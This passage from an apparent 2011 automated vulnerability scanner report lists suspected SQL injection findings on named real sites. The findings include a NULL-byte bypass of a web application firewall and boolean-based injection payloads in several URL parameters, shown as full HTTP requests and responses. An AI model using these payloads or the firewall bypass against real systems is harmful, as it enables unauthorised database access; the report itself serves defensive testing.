The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss%00'/wdgabccom,wdgasec/1/H.16/s39185238005593?[AQB]&ndh=1&t=17/8/2011%200%3A59%3A26%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Abios&g=http%3A//beta.abc.go.com/shows/charlies-angels/bios&r=http%3A//beta.abc.go.com/shows/charlies-angels&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Abios&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Abios&c9=atxt%2Bbios&c12=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Abios&v16=abccom%3Aprimetime%3Acharlies-angels%3Abios&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Abios&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&v24=Alfresco&c27=Unknown&c32=82f4af0d-d106-41a4-aa52-147d8fee51d1&v32=82f4af0d-d106-41a4-aa52-147d8fee51d1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=abccom%3Aprimetime%3Acharlies-angels%3Aindex&pidt=1&oid=http%3A//beta.abc.go.com/shows/charlies-angels/bios&ot=A&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; s_sess=%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240966296%3B

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:27:05 GMT
Server: Omniture DC/2.0.0
Content-Length: 392
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss%00''/wdgabccom,wdgasec/1/H.16/s39185238005593?[AQB]&ndh=1&t=17/8/2011%200%3A59%3A26%206%20300&ns=abc&cdp=2&pageName=abccom%3Aprimetime%3Acharlies-angels%3Abios&g=http%3A//beta.abc.go.com/shows/charlies-angels/bios&r=http%3A//beta.abc.go.com/shows/charlies-angels&cc=USD&ch=abccom%3Aprimetime&server=10.254.203.196&events=event3&products=ads%3B1666%3A52311%3A794658%3A52311%2Cads%3B2978%3A52311%3A851447%3A52311%2Cads%3B2979%3A52312%3A856015%3A52311&c1=abccom&h1=abccom%3Aprimetime%3Acharlies-angels%3Abios&c2=3EF1FA6F-091B-486C-85DF-D05197149F77&c4=NotSet&c5=abccom%3Aprimetime%3Acharlies-angels&c6=abccom%3Aprimetime%3Acharlies-angels%3Abios&c9=atxt%2Bbios&c12=abccom%3Aprimetime%3Acharlies-angels%3Aindex&c13=Charlie%2527s%2BAngels&c14=abccom%3Aprimetime%3Acharlies-angels%3Abios&v16=abccom%3Aprimetime%3Acharlies-angels%3Abios&v17=NotSet%3Aabccom%3Aprimetime&c19=abccom%3Aprimetime%3Acharlies-angels%3Abios&v19=abccom%3Aprimetime%3Acharlies-angels&v20=Charlie%2527s%2BAngels&v24=Alfresco&c27=Unknown&c32=82f4af0d-d106-41a4-aa52-147d8fee51d1&v32=82f4af0d-d106-41a4-aa52-147d8fee51d1&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1087&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=abccom%3Aprimetime%3Acharlies-angels%3Aindex&pidt=1&oid=http%3A//beta.abc.go.com/shows/charlies-angels/bios&ot=A&[AQE] HTTP/1.1
Host: w88.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; SEEN2=um8Mie4O:; TSC=1; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; s_sess=%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Aindex%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios%252526ot%25253DA%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240966296%3B

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 01:27:05 GMT
Server: Omniture DC/2.0.0
xserver: www596
Content-Length: 0
Content-Type: text/html


1.33. http://www.bradsdeals.com/dealsoftheday/subscribe/b [s parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The s parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the s parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b'%20and%201%3d1--%20&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:56 GMT
Connection: close
Content-Length: 1305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
   </head>
   <body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">D43C-B4C8-D45E-AE50</div>
</div>
   </body>
</html>

Request 2

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b'%20and%201%3d2--%20&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:56 GMT
Content-Length: 23948

<!DOCTYPE html>

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8">

   <title>Brad's Deals of the Day</title>
   <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />

   <meta name="y_key" content="851f0d788ded642a" />
   <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
   <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />

   
   <meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
   <meta name="y_key" content="7aee1ecd68e082ef" />
   <meta name="y_key" content="33d564d1ed93f6ba" />
   <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
   

   <meta name="robots" content="noodp" />
   <meta name="robots" content="noydir" />


   <meta name="robots" content="noindex, nofollow" />

   <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />

<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
   <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />

   
   <!-- RSS -->
   <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
   <!-- /RSS -->

   <!-- CSS -->
   
   <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
   



   <!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
   <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->




   <link rel="s
...[SNIP]...

1.34. http://www.bradsdeals.com/dealsoftheday/subscribe/b [tid parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The tid parameter appears to be vulnerable to SQL injection attacks. The payloads 13173906%20or%201%3d1--%20 and 13173906%20or%201%3d2--%20 were each submitted in the tid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /dealsoftheday/subscribe/b?tid=30665613173906%20or%201%3d1--%20&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:22 GMT
Connection: close
Content-Length: 1305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
   </head>
   <body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">9559-4CA2-4454-70E1</div>
</div>
   </body>
</html>

Request 2

GET /dealsoftheday/subscribe/b?tid=30665613173906%20or%201%3d2--%20&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=30665613173906%20or%201%3D2%2D%2D%20;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:35:23 GMT
Content-Length: 23937

<!DOCTYPE html>

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8">

   <title>Brad's Deals of the Day</title>
   <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />

   <meta name="y_key" content="851f0d788ded642a" />
   <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
   <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />

   
   <meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
   <meta name="y_key" content="7aee1ecd68e082ef" />
   <meta name="y_key" content="33d564d1ed93f6ba" />
   <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
   

   <meta name="robots" content="noodp" />
   <meta name="robots" content="noydir" />


   <meta name="robots" content="noindex, nofollow" />

   <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />

<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
   <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />

   
   <!-- RSS -->
   <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
   <!-- /RSS -->

   <!-- CSS -->
   
   <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
   



   <!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
   <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->

...[SNIP]...

1.35. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_campaign parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The utm_campaign parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_campaign parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55'%20and%201%3d1--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:40:38 GMT
Connection: close
Content-Length: 1305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
   </head>
   <body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">FD93-D5AD-C1CD-45A9</div>
</div>
   </body>
</html>

Request 2

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b&utm_campaign=comscore55'%20and%201%3d2--%20 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:40:39 GMT
Content-Length: 23937

<!DOCTYPE html>

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8">

   <title>Brad's Deals of the Day</title>
   <meta name="description" content="Subscribe to Brad's Deals of the Day and save 50 to 90% off of the Best Brands at the Best Stores." />

   <meta name="y_key" content="851f0d788ded642a" />
   <meta name="msvalidate.01" content="6E815F74ACE996420607DEF50C3E8A3A" />
   <meta name="msvalidate.01" content="217EE91F6AB271EBCAFDF73F1E9159CA" />

   
   <meta name="google-site-verification" content="JKmGeY1Dpm1nNBXpPjsWJZ5EfrG-7T-tHNncnBQw5RI" />
   <meta name="y_key" content="7aee1ecd68e082ef" />
   <meta name="y_key" content="33d564d1ed93f6ba" />
   <meta name="msvalidate.01" content="F61F001D7E37EF507EB0A708498048EA" />
   

   <meta name="robots" content="noodp" />
   <meta name="robots" content="noydir" />


   <meta name="robots" content="noindex, nofollow" />

   <link rel="canonical" href="http://www.bradsdeals.com/dealsoftheday/subscribe/b" />

<meta property="og:image" content="http://www.bradsdeals.com/res/images/shareimg.png"/>
   <link rel="image_src" href="http://www.bradsdeals.com/res/images/shareimg.png" />

   
   <!-- RSS -->
   <link rel="alternate" type="application/rss+xml" title="BradsDeals.com Most Recent Deals" href="http://www.bradsdeals.com/feed" />
   <!-- /RSS -->

   <!-- CSS -->
   
   <link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/opt/screen.css?v=20110616" media="screen" />
   



   <!--[if lte IE 7]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie7.css" media="screen" /><![endif]-->
   <!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="http://www.bradsdeals.com/res/css/screen_ie6.css" media="screen" /><![endif]-->




   <link rel="s
...[SNIP]...

1.36. http://www.bradsdeals.com/dealsoftheday/subscribe/b [utm_content parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.bradsdeals.com
Path:   /dealsoftheday/subscribe/b

Issue detail

The utm_content parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the utm_content parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b'%20and%201%3d1--%20&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 Denied
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-dotDefender-denied: 1
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:39:16 GMT
Connection: close
Content-Length: 1305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<title>Your request has been blocked</title>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<meta name="robots" content="noindex, nofollow, noarchive"/>
<style type="text/css">
body {margin:0px;font-family:Verdana,sans-serif;font-size:12px} #box {width:600px;border:solid 1px #5183b4;text-align:left; padding:5px; margin:100px auto auto auto} #datetime { text-align:left; color:#ABABAB; font-size:10px} #message { width:500px; margin:0px auto 0px auto; padding:0px} #refid { font-weight:bold; font-size:13pt; margin:10px auto 5px auto; width:500px; padding:0px} h1 {font-size:22px;color:#D70637;font-weight:bold;text-align:center} a {color:black} a:hover {color:#5183b4}
</style>
   </head>
   <body>
<div id="box">
<span id="datetime">16-Sep-11</span>
<h1>This request has been blocked.</h1><br/>
<div id="message">Please contact the site administrator, and provide the following Reference ID:</div>
<div id="refid">EC40-EAA6-197E-4D06</div>
</div>
   </body>
</html>

Request 2

GET /dealsoftheday/subscribe/b?tid=306656&s=adcom|display|comscore55-300redmixr-b&utm_source=adcom&utm_medium=display&utm_content=300redmixr-b'%20and%201%3d2--%20&utm_campaign=comscore55 HTTP/1.1
Host: www.bradsdeals.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000007248807&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=72295833&rk1=61125476&rk2=1316239535.083&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Set-Cookie: TID=306656;domain=.bradsdeals.com;path=/
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:39:16 GMT
Content-Length: 23937

<!DOCTYPE html>

<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
   <meta charset="utf-8">

   <title>Brad's Deals of the Day</title>
